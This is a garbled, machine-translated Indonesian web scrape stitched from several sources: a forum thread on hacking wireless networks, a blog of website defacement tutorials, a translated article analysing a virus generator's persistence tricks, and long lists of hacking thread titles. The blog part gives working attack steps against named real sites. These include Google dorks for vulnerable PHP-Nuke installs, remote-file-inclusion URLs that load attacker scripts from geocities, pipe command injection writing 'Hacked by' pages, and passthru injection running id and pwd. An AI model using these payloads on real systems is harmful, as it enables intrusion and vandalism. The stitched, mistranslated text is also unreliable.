Professional Documents
Culture Documents
The Unordinary
Enter your search terms
Web hyem.org
Submit search form
| LCD 15.6 "+ Key + Mouse = Rp. 950rb | LCD 19" + Key + Laser Mouse = Rp.1.300rb | LCD 16
"+ Key + Mouse = Rp. 990rb |
Palit HD4870
Palit HD4870 Sonic Dual Edition DDR5, 512MB, 256bit OC 775/4000 Dual Speed (in some cases
is still 256bit graphics lbh dr 5770 128bit superior, let alone reply we see from the price /
performancenya)
PROMO: $ 150
Palit HD4850
Palit HD4830 DDR3, 512MB, 256bit, Core: 575 / Mem: 1800Mhz + HDMI
Youngest brother of the family RV770, Still be the Price / Performance King!
PROMO: $ 90
With DDR3, High-end card is legendary high-end display card under $ 100, especially for high-
OC .. This babe is the Most Value King!
PROMO: $ 78, 512M: $ 65
ALL AVAILAVBE
Chat Now!
[more]
Last 20 Shouts:
-------------------------------------------------- ------------------------------
Panji
Today at 01:44:28 AM
Good for Hendy hyem .. lu ganyangka win bro ..
an35
Today at 12:50:18 AM
let kumbah-kumbah
toms_momo
Yesterday at 10:31:02 PM
quiet mas dab ...
Tito Haga
Yesterday at 07:51:15 PM
wakakakakaka
alexander_corvinus
Yesterday at 06:37:00 PM
wew do that 'an: p
B.U.G.S
Yesterday at 05:05:04 PM
@ Tito Haga
nge's iso-move nggo redirection tp ga, ga dadi metu MOVED .. MOVED .. MOMED marai ngunu
wae .. wakakaka ..
coolwin
Yesterday at 04:58:26 PM
BEST UPDATE CHECK today CF KILL !!!!! I'M IN RANK 2 wakakakakaka
Tito Haga
Yesterday at 02:51:11 PM
@ BUGS
hahahaha ... .. bar Tangi sori2 turu ngono kui ngemoved yes ... haha
donkey
Yesterday at 01:57:41 PM
wakakakaka ....
blackshield ™
Yesterday at 11:54:06 PM
cilukkkkkkkk
baaaaaaa ...
B.U.G.S
Yesterday at 10:39:35 PM
Jove, moved ming kok isine kabeh kie ..? nek nge-mending move topic lawas not dikei redirection
ga kang ..
Tito Haga
Yesterday at 08:26:27 PM
wakakakakka ... means the same boat
sadnux
Yesterday at 08:20:42 PM
its not about bersih2, tp itu lho yg in sign writing about college yg
parent often say kek gitu pas kl ane marahin T_T
Tito Haga
Yesterday at 08:13:04 PM
Hahahahaha ... yes ... maap2 technical error had bersih2 le ngemovednya wrong ... so kamr jugah::
sadnux
Yesterday at 08:09:47 PM
beautiful morning .. tp yg ketendang same directly pack signaturenya ditto
wakakakak
Tito Haga
Yesterday at 07:56:09 PM
morning kang
sadnux
Yesterday at 07:47:53 PM
met pagi all
Tito Haga
Yesterday at 06:34:29 PM
weh ... kang banner onlen
Panji
Yesterday at 06:13:51 PM
miss u all ...
Tito Haga
Yesterday at 05:30:56 PM
Ndalu gang
Polling
Lates Post
Sell fingerboard where y. .. by vheebhee [Today at 03:46:23 AM]
Tanya Mo. .. More Niy Can ... by Genah_wae [Today at 03:20:28 AM]
help me by botaxalim [Today at 02:04:50 AM]
EXPLANATION PLEASE wearing ... by botaxalim [Today at 01:54:06 AM]
Update March 5, 2010 Cross ... by botaxalim [Today at 01:36:16 AM]
[ASK] Building Network by botaxalim [Today at 01:28:59 AM]
Asus ROG Series 890FX Mot ... by Hazzan [Today at 12:24:06 AM]
guitar hero pc pake maen ... by SYXXness [Yesterday at 11:30:42 PM]
- Post Works 3D Made An ... by B.U.G.S [Yesterday at 10:05:46 PM]
(WTA) Cooling Procie Unru ... by kocek99 [Yesterday at 07:51:45 PM]
[WTA] 915GAV Intel 3x Tit ... by masYogo [Yesterday at 05:45:43 PM]
(Unlocking Test) Biostar ... by sandlewood [Yesterday at 01:37:37 PM]
Software audio player by Tito Haga [Yesterday at 07:20:09 PM]
Adjust DDR3 you ...!!! by masYogo [Yesterday at 05:18:00 PM]
[review] HaPe Modem "ray ... by frozr_man [Yesterday at 05:08:18 PM]
AMD VS INTEL <FIGHT! > By didit_catro '[Yesterday at 04:15:54 PM]
[Ask About] proci Warranty ... by sadnux [March 04, 2010, 11:03:15 PM]
[WTA] How to mbungkam Fan B. .. by SYXXness [March 04, 2010, 08:45:18 PM]
Mainboard 890gx / 890fx by frozr_man [March 04, 2010, 08:44:57 PM]
Creativity Adu Wallpaper by donkey [March 04, 2010, 07:16:40 PM]
Statistic
Members
Total Members: 10,884
Latest: Ricko
Stats
Total Posts: 102,876
Total Topics: 7713
Online Today: 56
Online Ever: 448
(April 04, 2008, 05:10:06 AM)
Users Online
Users: 15
Guests: 61
Total: 76
MARJ1NAL
Gytautas
paulpierce
myscreen
AKA2
citraxeena
best
brewox
arveds
Aero
B.U.G.S
Ricko
damonrulz
coolwin
aikendeva
Visitor MAP
Hot http://www3.clustrmaps.com/counter/maps.php?url=http://www.hyem.org NEWS
The Unordinary Community> Forum> == SOFTWARE ==> Security (Moderator: Light)> Hacking
Wireless LAN!
Pages: [1] Go Down «previous next»
Print
berang_berang
Trade Count: (0)
[POWERED]
Posting Quality: 0
Offline
View Inventory
Send Money to berang_berang
Topic starter
-------------------------------------------------- ------------------------------
Kalo we want to hack the standard w.LAN tools2 what we wrote butuhin, and how gmana?
Trus kalo yg pake linux tools recommended what? kalo windows what?
Kalo mau nyolong gmana Internet connection?
Logged
Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 1 on: March 13, 2006, 01:02:12 PM»
-------------------------------------------------- ------------------------------
kismet for netstumbler & nyari AP or SSID yg buat airsnort active & ngecrack password ...
manual installation & tutorial googling aja. Jgn lupa kalo successful password share ...........
Logged
-------------------------------------------------- ------------------------------
Logged
RooTrick
[Community Member]
Trade Count: (0)
[POWERED]
Posting Quality: 0
Offline
View Inventory
Send Money to RooTrick
-------------------------------------------------- ------------------------------
download dmn tuh om?
trus kalo uda dapet makes source code applications na na gmn?
thx bgt ...
: mrgreen:
Logged
-------------------------------------------------- ------------------------------
Let the world revolves around me ...
densinyo
[Community Member]
Trade Count: (0)
[Enthusiast]
Posting Quality: 0
Offline
View Inventory
Send Money to densinyo
-------------------------------------------------- ------------------------------
DL dmn tuh ... boleh dong requested the link ...
Logged
-------------------------------------------------- ------------------------------
T-Force 550! Athlon64 X2 4000 +! Adata 2gb! AcBel 400w! WDC 500GB! Pioneer DVD RW!
Lite-On DVD! A4Tech
-=- environment ranging from self-=-
081-5612-7812
-------------------------------------------------- ------------------------------
Logged
Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 4 on: March 21, 2006, 03:09:47 PM»
-------------------------------------------------- ------------------------------
I have lg nih project, make antenna can make WiFinya YKPN shoot, there have any experience yg
ga tin bkin antenna?
Search tool material n ada yg tau ga?
This tutorial is reply pd sdikit interest:
You are not allowed to view links.
Register or Login
Logged
MAS
[OprekPC]
Trade Count: (0)
[POWERED]
Posting Quality: 0
Offline
View Inventory
Send Money to MAS
-------------------------------------------------- ------------------------------
This follow aja deh ... You are not allowed to view links.
Register or Login sdh was too old Linux (Auditor following sdh n dah find her hard to replace
Backtrack) tp sure deh, klo you are able to implement, easy wuiiih banged.
one more thing .... wifi chipset election jg jd diliat pertimbangan.bisa here
klo for windows, in addition netstumbler pake aja WDRIVER and AirSnort.jamin isa (klo cuman
make WEP) tp klo dah target MAC auth make it give up deh mas ... hehehe, before there isa yg
Logged
-------------------------------------------------- ------------------------------
You are not allowed to view links.
Register or Login
OprekPC ..:::.. Mods - Tweak - Overclock PC
still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
-------------------------------------------------- ------------------------------
gini bro, I'm on campus pake pake internet.tp facility via pc connected via LAN. trus time ta 'clay
found in the network is also connected via laptop2 wifi. I liatnya pake cmd, trus ta 'type "net view"
out tu laptop2nya. can ta 'not hacked from the pc I pake?
thanks ya ... (just curious, do not want to harm everybody)
Logged
psyCHo_L061c
Trade Count: (0)
Posting Quality: 0
Offline
View Inventory
Send Money to psyCHo_L061c
Re: Hacking Wireless LAN!
«Reply # 7 on: January 08, 2007, 04:52:37 PM»
-------------------------------------------------- ------------------------------
bisa aja om mah ..... hehehehe it easy, if u could've and taw gimana cara fingerprinting and foot
printingnya oms
trus taw a bug we're looking for security holes or it is what there do ,,,...... hehehehehehe so i am
just newbie
Logged
still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]
Posting Quality: 8
Offline
View Inventory
Send Money to still_ndESo
No Body's Perfect
-------------------------------------------------- ------------------------------
Quote from: psyCHo_L061c on January 08, 2007, 04:52:37 PM
bisa aja om mah ..... hehehehe it easy, if u could've and taw gimana cara fingerprinting and foot
printingnya oms
trus taw a bug we're looking for security holes or it is what there do ,,,...... hehehehehehe so i am
just newbie
Logged
-------------------------------------------------- ------------------------------
Order: hyem_toko
Logged
silverx
Trade Count: (0)
[Enthusiast]
Posting Quality: 1
Offline
View Inventory
Send Money to silverx
-------------------------------------------------- ------------------------------
These tools can be useful for browsing sangant increasingly entering a network, Cain And Abel via
google search .... aj certainly can, install and run, there you can open companies that adapada
network, although worgroupnya different ...........................
I was confused for existing antenna tutorinya above, connect to port ake PCnya hell? pake serial?
ato pake USB?? his antennae cuman doang ditutorial
Jump aj boss ...
Happy Hacking ..
Hacking is ART .. ^ ^
Cheap 1 August 2009 at 12:13 pm Thank you for this valuable post. It changed my approach
Troy on 23 August 2009 6:44 pm q nyoba dh successful ... .. mantep bgt tu link
http://www.abettergradetutoring.com/nuke/index.php
q kmrin nyoba
AddAuthor & add_aid = q sakaw32 ... .. AddAuthor & gnti with add_aid = Trojan ... ... .. trus gnti q
& add_name =
God & add_pwd = Trojan
eCcgVU5JT04gU0VMRUNUIDEvKjox
penjlasannya please ..
ovasagaf on 25 August 2009 8:52 pm gini aja bro, lo udah site deface what? cz situs2 yang laen gw
ga bisa smua try, ...
Afrikaans
Albania
Arab
Bahasa Indonesia
Belanda
Bulgar
Byelorusia
Cek
Dansk Esti
Farsi
Galisia
Hindi
Ibrani
Inggris
Irlandia
Islan
Italia Jepang
Jerman
Katalana
Korea
Kreol Haiti
Kroat
Latvi
Lituavi
Magyar Makedonia
Malta
Mandarin
Melayu
Norsk
Pilipino
Polski
Portugis
Prancis Rumania
Rusia
Serb
Sloven
Slowakia
Spanyol
Suomi
Swahili
Swensk Thai
Turki
Ukraina
Vietnam
Wales
Yiddi
Yunani Php nuke hack site yoo ... ..
Go to the site www.google.com
trus type =>
allinurl: .com / nuke / index.php or
allinurl: .org / nuke / index.php.
Well ... .. targetnyo reply then dem see step
selanjutnyo are:
1. www.target.com / nuke / index.php
2. www.target.com / nuke / admin.php =>
index.php reply above was modified
so admin.php
3. This bug Masukke behind this site:
Kalo is the site they will be fierce dem in his path kek admin.
But the reply successfully, then the url / browsing lu appear
www.target.com/nuke/admin.php?op=mod_author
5. Disano send you the login, masuke id & password you were.
Remember?
id = budakbaonk => clay wrote above earlier
password = scum => clay wrote above earlier
Now you She dem go to "Administration Menu" the site said.
He meant you had a site that mengusai skrg! He he he he he
Skrg you select an image Mobile (dibawahnyo ado writing Messages),
Column title =>
Exploit:
/*
BindTTY.c
Created by someone
i just Modify ..
Open Telnet with Password,
Stealth Background Processes ..
/ * EOF * /
KumpulBlogger.com
Deface Steps
Posted 7 October 2005 in Hacking at 23:25 → 18 blogger comments
Deface php nuke site
Kalo not want your site in the path tsb udah nya ama admin.
But the reply successfully, then the url / browsing lu appear
www.target.com/nuke/admin.php?op=mod_author
========================================
=======================================
Open ms.frontpage, click the tab above format, trus select backgrounds,
trus select enable hyperlinks, trus select background color,
select color black, trus ok
Trus yg select the tab above the center (middle level) ms.word kayak,
no.5 select the font size (18pt), trus select the font color (yg image A),
select color red, kalo udah Hacked by writing your nick name,
hit enter 3 times Trus type
Hey Admin ... ... .. do you a need help? trus enter once,
trus write Matrix.Dal.Net - # surabayahack, trus enter 3 times
Kalo kalo mau pake insert an image select the tab above, trus select pictures,
trus select from the file ...., in the file name type
http://www.finagro.gov.co/902.gif or search for jpg files / gif in the pc lu
trus ok Kalo mau pake music select the format above,
select backgrounds trus trus select general tab,
the "background sound location" type
http://www.indonesia.go.id/berkibar.mid or search for midi files on pc lu
trus its ok Utk keep select the file above, select save as ...
File name: Hacked or your nick name, trus ok
Note: if time lu store there files out
"Save embedded file" select "set action" trus select "dont save" trus ok
Tough for a preview of the results choose the tab at the bottom.
=======================================
example:
Website: www.boneka-lucu.com
Origin: doll shop
Comments:
Note:
Kalo is not no picture, there is only writing yg
Name: deface
Email: deface_2005@yahoo.com
Website: www.deface.com
Origin: virtual worlds
Comments:
Note baik2 imaginable in order comment field, with the way SQL Injection into the guestbook they
will be, there we will enter the script for deface.
Note:
Before entering the script above lu said, need to edit his first match kata2
lu desire.
IV. Click the "submit" button or what it's called sky-guestbook tsb.
Next open url / new browsing this target type trus www.namatarget.my / guestbook.php
Kalo results have not been there, try clicking the tab "refresh" next url / browsing lu.
Well ... come deh results we deface the guestbook tsb.
======================================
======================================
deface cgi
=======================================
cgi deface II
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|id |
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd |
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|echo "Hacked by
psychophysiological. Hey admin ... do you a need help? Matrix.Dal.Net - surabayahack "> /
usr/home/web/users/a0004481/html/adspro/jh.html |
http://www.sports-media.org/adspro/jh.html
http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|echo% 20
======================================
http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c=4
the original file
modules/PNphpBB2/includes/functions_admin.php? phpbb_root_path =
it's a bug
http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?
phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?
http://www.narnia-chroniken.de/modules/PNphpBB2/includes/functions_admin.php?
phpbb_root_path=http://geocities.com/sandal_karet/script/arai2.jpg?
type: pwd
cd / homepages/7/d117874362/htdocs; wget deface file
========================================
=========================================
http://www.bpmpt.go.id/forum/index.php
the original file
includes / db.php? phpbb_root_path =
it's a bug
be disposed index.php
http://www.bpmpt.go.id/forum/includes/db.php?
phpbb_root_path=http://www.geocities.com/sandal_karet/script/ara2.jpg?
==========================================
http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12
the original file
& highlight =% 2527.passthru ($ HTTP_GET_VARS [a]).% 2527 & a = id; pwd
it's a bug
=========================================
http://www.friendster.com/useropen.php?uid =
<<<<<< Enter his id number
===========================================
http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php?
phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?
http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/
http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk =
http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/sql.htm?
&cmd=id; pwd
http://img143.imageshack.us/img143/6782/hacked8lc.jpg
http://www.sobatpadi.net/download/
http://www.sinjai.go.id/profil.php?
kat=kelautan_perikanan&dir=http://www.geocities.com/dian_maulani2005/inject.htm?&cmd=id;
pwd; ks% 20-la
http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani
Vulnerabilities pesan.php
Posted 21 September 2005 at 16:29 hrs Hacking → Just one person who commented
Open www.google.co.id trus type allinurl: .org / pesan.php
Kalo udah it can be the target of his example: http://policewives.org/pesan.php
trus liat Clik here to sign in message. Http://policewives.org/pesan.php?op=add link
Inject messages in the column with the script:
Kalo is his image that can dideface.
Kalo is not no picture, writing imaginable means not only can dideface.
Jgn disappointed! yg target another search.
Kalo Furthermore, there was his picture we inject the script again with deface guestbook (See
tutorial deface guestbook).
FINISHED!
- Arai --
Only the ordinary man who many flaws ...
"If I die tomorrow ... I'd be allright Because I believe ... ... That after were gone ... The spirit carries
on"
View blog authority
New Comment
Affiliate on Beritajitu.com SCAM SEO Contest:: Very interesting. A scientific approach to
success ...
ShepardEBONY28 on NPWP Personal:: Every body understands that humen's life seems to be ...
Reon on Who Said Jesus bachelor's life:: BY AL-QURAN AND THE GOSPEL (who now often ...
hanif IM on Woro-Woro Discussions and Launch of book "The Book enthusiast: 100 Note reversed
Book":: ...
Through coup ElliottINES on Democracy:: I strictly recommend not to hold off until you get ...
Hot Comments
»Tutorial Carding - 105
»" Irena Handono wrote a funnel Mualaf MUI "Really? - 93
»The title might be" HOPE THE Sinner "- 81
»Surabaya Underground - 78
Categories
Open | Close
Curhatan (45)
Way of life ba ...
Finally terb ...
Maja insult Main
Is this "P. ..
Good morning ...
Abstinence Surrender
Through the coup ...
The title may ...
Whether what Jud ...
Ngelindur?
Between tanggu ...
Fuel beneran t. ..
Like GOLPU ...
What is sala ...
Looks like you ...
Thx Babe ...
Quiet ...
White doves ...
He said the love ...
They know it ...
The dream was to ...
RAS is not ...
My Missing ...
When I'm Fa ...
Ketenggengan ...
Project yg te ...
Syukurku
Creation of K. ..
The Art of Lo ...
Agnez Lidya ....
Who I am?
Should be happy ...
She'll come b. ..
Finally Berk ...
Sisi Lain
God Too ...
New Original Mud ...
FUCK
Beach Love
Prayer
Wild ...
Melow ya ...
Remembering ade ...
uh ... suck ....
Miss U ALL
Hacking (15)
Disable Regedit
Yahoo adu credit ...
Integramod Po ...
Mambo compone ...
Fastpublish C. ..
Bug The Day
Carding Tutorial
Remote Shell ...
Detik.com
Barontok Viru ...
Nmap Tutorial
Backdoor Bindtty
Step-Langk ...
Vulnerabilit ...
Carelessness ...
Graffiti (80)
Domain Available
Finally terb ...
Good morning ...
Asia Carrera ...
Nyaliku kissed ...
How to menghila ...
Oath Seneng ...
Commission Only CIB ...
Pen plotters ...
Through the coup ...
The title may ...
Different Smoking ...
Survey EDITION ...
Besides Pahlaw ...
Behind Silence ...
Ngelindur?
Personal NPWP
Fuel beneran t. ..
Like GOLPU ...
What is sala ...
Roy Suryo Kem ...
Sleep dreams
Hanya Untukmu
Engineering licked
GAY couples ...
Survey ISSUE ...
Fate Not P. ..
Poetry Lulu Wa ...
I MISS U
That night ...
Cuman Seven K. ..
Experience ...
He said the love ...
They know it ...
Se'enggaknya ...
The PencariMU
Wedding On Line
I'm Turning a Blind Eye
Blessings in Bul ...
Rumah Idaman ...
Who Love Me ...
Forbidden!
"Hey" ... !
Hates not a sissy
Surabaya Unde ...
14 Guidelines for Life
Live or Life
Travel
Biggest Lies
Men days ...
Paranormal Be ...
Finally, the B. ..
Fact Pah ...
N GUY?? O. ..
One night i. ..
Marhaban Ya R. ..
Surabaya Unde ...
Love Songs
Cayoooo ...
Lagu Rindu
True realists
Jewish?
Atheism and Ah ...
Lock nut
Suharto's Fami ...
Sapa ya?
Hosting effort ...
Quote of the ...
"Email from S. ..
ARF.Net Ujan
Recognition of Mother ...
"Irena Handon ...
Lover Heart
Proclamation & ...
about JESUS ...
CONFLICT theology ...
Who Said ...
Should Yesu ...
News ttg Na ...
Sejah mystery ...
Disagree (17)
Through the coup ...
Survey EDITION ...
"Doggy Style" ...
Do You Need a Guru
Personal NPWP
Fuel beneran t. ..
Why the ...
Welcome Back!
He said the love ...
They know it ...
Marry ... Mar ...
Dhani said "M. ..
What narcissist na ...
As Prose ...
Ga reason to ...
Reverend and U. ..
No More
Links (12)
SEO contest Di ...
Woro-Woro Dis ...
How to menghila ...
Agus ... Agus
Different Smoking ...
Aneka Express ...
Java Programm ...
Behind Silence ...
Acts No Sem ...
Hoo
Campaign Blog ...
Think this
Film (2)
Oath Seneng ...
ONE-ye ...
Laughed Dunk (1)
Agus ... Agus
Archive
Open | Close
2010 (2)
January (2)
SEO contest Di ...
Domain Available
2009 (26)
July (1)
Way of life ba ...
June (3)
Woro-Woro Dis ...
Finally terb ...
Maja insult Main
May (2)
Is this "P. ..
Good morning ...
April (3)
Asia Carrera ...
Nyaliku kissed ...
How to menghila ...
March (5)
Oath Seneng ...
Abstinence Surrender
Commission Only CIB ...
Pen plotters ...
Agus ... Agus
February (7)
Through the coup ...
The title may ...
Different Smoking ...
Survey EDITION ...
Whether what Jud ...
Aneka Express ...
Besides Pahlaw ...
January (5)
Java Programm ...
Behind Silence ...
"Doggy Style" ...
Do You Need a Guru
Ngelindur?
2008 (26)
December (4)
Between tanggu ...
Personal NPWP
Fuel beneran t. ..
Like GOLPU ...
November (4)
What is sala ...
Roy Suryo Kem ...
Why the ...
Sleep dreams
October (4)
Hanya Untukmu
Engineering licked
GAY couples ...
Welcome Back!
June (2)
Survey EDITION ...
Looks like you ...
May (1)
Thx Babe ...
April (2)
Quiet ...
Fate Not P. ..
March (4)
Poetry Lulu Wa ...
White doves ...
I MISS U
That night ...
February (4)
Cuman Seven K. ..
Experience ...
He said the love ...
They know it ...
January (1)
Se'enggaknya ...
2007 (37)
December (3)
Marry ... Mar ...
The dream was to ...
The PencariMU
November (1)
Wedding On Line
October (2)
I'm Turning a Blind Eye
Blessings in Bul ...
September (7)
RAS is not ...
Rumah Idaman ...
My Missing ...
When I'm Fa ...
Who Love Me ...
Ketenggengan ... How to Create Virus in instantly!
Remember the Aksika virus? Virus "open source" is one that does have a lot of variants. No wonder
because the source code is not provided free on the Internet, so anyone can easily modify and
compile the source code and be a new variant.
Starting from the ease of that, many viruses maker or a beginner programmers trying to make a
virus without the need to bother. Most needed is knowledge about the operating system and
programming.
But convenience is not how, when compared to using the program Virus Generator. From the name
alone, we can expect the use of the program. Yes, Virus Generator is a program to be able to make
the virus easily and instantly.
Starting from a sample of a virus that pretty much sent by readers to us. PC Media Antivirus
Gen.FFE know her name, Dawn, but other antivirus which is also called by the name Brontok.D.
With a simple investigation finally note that the virus was made using a Virus Generator.
Generator virus was created using Visual Basic language and in-compress using tELock packer. In
the package there are two files, namely Fast Firus Engine.exe and data.ex_. Fast Firus Engine. exe
is the main program in the making of the virus and while the file is actually a body data.ex_ original
virus that has not dimodifi kasi.
When Firus Engine.exe Fast file is run, the user will be confronted with an interface. You just told
to fill in the name of the virus, the name of manufacturer, and his message. Then by pressing the
Generate button, it will be your virus.
The workings of the generator is actually very simple. He just added the data you enter this file to
the end of the original virus (data.ex_). Later this information is used by the virus in the process of
infection.
When the virus is executed first time, he will make some master files in several locations. Like in
the directory \% WINDOWS% \, will have a file with nama.exe, Win32 exe, activex.exe, and%
virusname% (the name of the virus according to the manufacturer filled by the Generator). In \%
WINDOWS% \% system32% \ will have copy.pif files, _default.pif, and surif.bin. In addition, he
also alter or create a Oeminfo.ini file that is part of the System Properties. So if your computer is
infected by the virus results generated from FFE, then the System Properties will have the words
"Generated by Fast Firus Engine".
In the directory \% WINDOWS% \% System% \'ll have some more master files that use the same
name as the file system of Windows, such as csrss.exe, winlogon.exe, lsass.exe, smss.exe, svchost.
exe, and winlogon.exe.
And do not forget, the root drive will have a file named "read euy.txt" which contains the messages
from the creator of the virus. So when creating a virus using the generator, then the manufacturer
will be served some input boxes, such as the Author of the virus, Name of the virus, and Messages.
Now, the contents of this message box that will appear in the file "read euy.txt" it.
After the virus managed to copy a file to their parent in the system, he will run the main file before,
so that the memory process will have some viruses, such as csrss.exe, winlogon.exe, LSASS. exe,
smss.exe, svchost.exe, and winlogon.exe. Process names similar to the process / services of
Windows is probably on purpose to deceive users. To distinguish them, you can see the path or the
location of the executed process. Process virus usually run on System directory as the process /
services are running Windows property usually comes from System32 directory.
Changing Registry
This virus adds a startup item on the registry so when he can start running Windows automatically
or to change the settings of Windows to suit his desires. Information about the registry that the
reversal will not be able to easily see that the encrypted condition.
What he changed was the way the value of Userinit items by adding parameters to the parent file. At
key HKEY_CURRENT_ USER \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Windows \
Load item will also be changed to point to a file with the name of the parent Activex.exe. In the
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ will have a
new item with a present. Key HKEY_ LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \
CurrentVersion \ Run \ will have new items as well with the default name and% username%,
username here is the name of the current user at the time.
Virus generated from the FFE results also change the shell extension for the file. Exe, namely by
changing the type of information from the Application to File Folder. Setting the Options folder is
also modified to not show the extension and each fi le with hidden attributes. And that can be active
at the safe-mode, he also changed the value of the item SafeBoot.
By using the help of registry Image File Execution Options, the virus also adds a new item on the
section with the name of cmd.exe, msconfi g.exe, regedit.exe and taskmgr.exe. The point is that
every user who accesses the program with the file name like that, it will be bypassed by Windows
and transferred to the main file of the virus.
Another virus files were stored in a new directory in the flash disk with the name of the file
containing the Recycled Firus.pif and Folder.htt. All of these virus files hidden in conditions that are
not visible.
Virus Action
To survive, the virus will try to block any program that he did not want such tools or programs,
including antivirus PCMAV. Just as the changed registry data, data about what programs are
blocked by it is also present in the body in a state encrypted.
So, when the virus was stay in memory, he will monitor each program accessed by the user, ie by
reading the file name and window caption. Some of the files are tested for antiviral dibloknya is
nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, and many
others. Including some or installer setup program can not run on the infected computer.
Afrikaans
Albania
Arab
Bahasa Indonesia
Belanda
Bulgar
Byelorusia
Cek
Dansk Esti
Farsi
Galisia
Hindi
Ibrani
Inggris
Irlandia
Islan
Italia Jepang
Jerman
Katalana
Korea
Kreol Haiti
Kroat
Latvi
Lituavi
Magyar Makedonia
Malta
Mandarin
Melayu
Norsk
Pilipino
Polski
Portugis
Prancis Rumania
Rusia
Serb
Sloven
Slowakia
Spanyol
Suomi
Swahili
Swensk Thai
Turki
Ukraina
Vietnam
Wales
Yiddi
Yunani
©2010 Google - M
Injektor (kalo ada yang membutuhkan)
rapidshare hack!!
Lumpuhkan Komputer satu LAN dengan Ettercap DOS Attack
Cara Hack password Deep Freeeze 6.0
Melemahkan AP Dengan AP
Melumpuhkan AP dengan Void11
Panduan Download MP3 Lagu Indonesia @ Google & Multiply
Hacking Cpanel Dengan C99
Pembobolan Ratusan bahkan Ribuan Router ADSL
Anatomy Hacking
Journal Password Online, Gunakan dengan bijak, kasian yang punya nya
curi data flash
hacking friendster
situs hacker
download youtube tampa progam
rapidshare premium
Mengecoh Org Membuka File
How to Hack Yahoo Passwords
beberapa contoh shell inject++
Hidden Tools Xp
Google Aneh
Film Rahasia di XP!!!
Bkin logo google
Teknik Serangan DOS
DEFACeR
source code php injector
Fake Login FS
(ask) ngehack Password game OL
[ASK] cara non aktivin timer/billing
{ASK} IP Friendster
Show off ARENA
Tips Internetan GRATIS via XL
HACK hati temen km (tentang siapa yg dia suka sebenernya)
Tingkatan Masyarakat Hacker
Cara Hacker curi data Kartu Kredit
aku mo share sdikit ilmu ni
Ultimate Hacking Experience (2008)
<ask> ad yang bisa hack game OL
Intip Private Photo dan Private Profile pada FRIENDSTER
yang DOYAN CRACK CC MASUK SINI
cara sederhana dan mudah hack paypal
Teknik Carding Untuk Para Pemula
Digishop
Mendeteksi Login Ssh Yang Menggunakan Magic_passwd
DEFACE with PHP Injection
Membuat injector berformat JPG
Driver NVIDIA
Cara Simple Bikin VIRUS
Mainan DDOS
pendatang baru di sub HACKING
Flood YM Sederhana <muuph hanya sekedar berbagi aja>
Ayo Belajar Bersama (Malas Ngasih Judul)
Deface with PHP Injections
Windows XP MultiUser Remote Desktop
Cara Simple Colong Swf
Ngobrol Teroosssss Sampe Doweeerrr
Utak Atik HaPe NOKIA
utak atik regedit windows XP
Penyelundup file
Iseng YM ria pake OS Linux
Memanfaatkan Kelemahan Billing Explorer
Teknik Membobol Keamanan Warnet Windows
Mempercepat performa Vista basic
Jadi Hacker Tidak Perlu Pintar
Intip Private Photo dan Private Profile pada FRIENDSTER NEW!!!! live vdeo
Wireless Hacking Live - FBI version ISO
cari tahu IP addr dr ID YM,bisa gak ???
Iseng Yuukkzzz
Panen password di LAN dan alternatif proteksinya
Dari guest menjadi administrator....
Kecil isa bikin Modyiar
Biar kagak ketangkep kalo mau iseng2...
Nongkrong Di Localhost
faster mail bomber + anonymous
Take Over Computer Lawan
ganti admin pass pada pc
Hacking Windows Registry
cara ampuh ngilangin DeepFreeze v6... klo g tau password
Miss Indonesia
[Sulap] Windows XP "Bajakan" kamu jadi 100% Asli
[ISENG] - Ngerjain Orang Lain Pakai Notepad
VBS Virus Maker
Merubah WINDOWS BAJAKAN JADI GENUINE TANPA SOFTWARE APAPUN !!!!!
(ISENG)mo ngerjain tmn? *tukang jahil hrs masuk thread ini*
[SHARE] Bom SMS ........ (tested on XL)
Hack Premium Akun Download Unlimited
Hack Akun Megashare Premium
Hack Premium Akun Vbulletin
Hack Akun divxcrawler
xander international
buat yg belom punya pacar
Cara merusak profil fs orang
crackershit.co.cc
Cara Hack friendster neeh !
[ASK] cara ngehack forum ini.....
berbagi: kasperky key yang selalu terkini dan tidak blacklist
Deface web menggunakan SQL Injection pada X-Ice System V-1
Ada yang bisa gak..??
Tips cara membuat microsoft office 2007 Genuine
[REQ] Get Chip
Hack wireless mudah n cepat alias instan
hack FS
Tutorial Hacking
mohon bantuan
decrypt-encrypt
.com.my
facebook freezer
Hack Billing Indo
Kumpulan eBook Hack
[req]account premium rap*dsh*re n mega*pload
(ask)bypass hackshield PB IndoForum> Hobby> Computer Stuff> Security & Hacking> [ASK]
bntar Aza, Plss
-------------------------------------------------- ------------------------------
PDAView Full Version: [ASK] bntar Aza, Plss
-------------------------------------------------- ------------------------------
Gloria04-11-2006, 07:45 pm
KK, How I Teach Please Gunain Google Hacking / heh badminton Search the Web Yg Bisa PHP
Injection / sob Plzz ... GRP + +
-------------------------------------------------- ------------------------------
itlust04-11-2006, 08:13 pm
site search mo ye yg kayak gimana ni used?
-------------------------------------------------- ------------------------------
D-Cracker05-11-2006, 06:01 PM
May mean Doi, PHP Web Nyari Bs In reply Dgn Deface PHP Injection /! Ehmm .... Situs Bokep
